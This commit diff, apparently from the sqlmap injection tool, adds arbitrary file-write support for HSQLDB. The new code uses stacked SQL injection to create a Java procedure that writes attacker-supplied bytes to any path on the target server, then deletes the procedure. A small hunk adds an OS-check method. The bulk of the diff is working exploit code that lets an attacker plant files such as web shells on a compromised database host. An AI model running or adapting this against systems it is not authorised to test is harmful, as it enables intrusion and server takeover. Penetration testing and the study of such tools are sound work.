HSQLDB write file support (#4379)

tree-chtsec · tree · web-flow · commit babe52eb1087 · 2020-10-13T10:56:39.000+02:00
* Make asterisk work with --csrf-token option

* add --file-write support in HSQLDB

Co-authored-by: tree &lt;chtpt@treedeMacBook-Pro.local&gt;
diff --git a/plugins/dbms/hsqldb/filesystem.py b/plugins/dbms/hsqldb/filesystem.py
@@ -5,6 +5,12 @@
 See the file 'LICENSE' for copying permission
 """
 
+from lib.core.common import randomStr
+from lib.core.data import kb
+from lib.core.data import logger
+from lib.core.decorators import stackedmethod
+from lib.core.enums import PLACE
+from lib.request import inject
 from lib.core.exception import SqlmapUnsupportedFeatureException
 from plugins.generic.filesystem import Filesystem as GenericFilesystem
 
@@ -13,6 +19,45 @@ def readFile(self, remoteFile):
         errMsg = "on HSQLDB it is not possible to read files"
         raise SqlmapUnsupportedFeatureException(errMsg)
 
-    def writeFile(self, localFile, remoteFile, fileType=None, forceCheck=False):
-        errMsg = "on HSQLDB it is not possible to write files"
-        raise SqlmapUnsupportedFeatureException(errMsg)
+    @stackedmethod
+    def stackedWriteFile(self, localFile, remoteFile, fileType=None, forceCheck=False):
+
+        funcName = randomStr()
+        MAX_BYTES = 2 ** 20
+
+        debugMsg = "creating a Java Language Procedure '%s'" % funcName
+        logger.debug(debugMsg)
+
+        addFuncQuery = "CREATE PROCEDURE %s (IN paramString VARCHAR, IN paramArrayOfByte VARBINARY(%s)) " % (funcName, MAX_BYTES)
+        addFuncQuery += "LANGUAGE JAVA DETERMINISTIC NO SQL "
+        addFuncQuery += "EXTERNAL NAME 'CLASSPATH:com.sun.org.apache.xml.internal.security.utils.JavaUtils.writeBytesToFilename'"
+        inject.goStacked(addFuncQuery)
+
+        logger.debug("encoding file to its hexadecimal string value")
+
+        fcEncodedList = self.fileEncode(localFile, "hex", True)
+        fcEncodedStr = fcEncodedList[0][2:]
+        fcEncodedStrLen = len(fcEncodedStr)
+
+        if kb.injection.place == PLACE.GET and fcEncodedStrLen > 8000:
+            warnMsg = "the injection is on a GET parameter and the file "
+            warnMsg += "to be written hexadecimal value is %d " % fcEncodedStrLen
+            warnMsg += "bytes, this might cause errors in the file "
+            warnMsg += "writing process"
+            logger.warn(warnMsg)
+
+        debugMsg = "exporting the %s file content to file '%s'" % (fileType, remoteFile)
+        logger.debug(debugMsg)
+
+        # http://hsqldb.org/doc/guide/sqlroutines-chapt.html#src_jrt_procedures
+        invokeQuery = "call %s('%s', cast ('%s' AS VARBINARY(%s)))" % (funcName, remoteFile, fcEncodedStr, MAX_BYTES)
+        inject.goStacked(invokeQuery)
+
+        logger.debug("removing procedure %s from DB" % funcName)
+        delQuery = "DELETE PROCEDURE " + funcName
+        inject.goStacked(delQuery)
+
+        message = "the local file '%s' has been successfully written on the back-end DBMS" % localFile
+        message += "file system ('%s')" % remoteFile
+        logger.info(message)
+
diff --git a/plugins/dbms/hsqldb/fingerprint.py b/plugins/dbms/hsqldb/fingerprint.py
@@ -144,3 +144,13 @@ def checkDbms(self):
     def getHostname(self):
         warnMsg = "on HSQLDB it is not possible to enumerate the hostname"
         logger.warn(warnMsg)
+
+
+    def checkDbmsOs(self, detailed=False):
+        if Backend.getOs():
+            infoMsg = "the back-end DBMS operating system is %s" % Backend.getOs()
+            logger.info(infoMsg)
+        else:
+            self.userChooseDbmsOs()
+
+
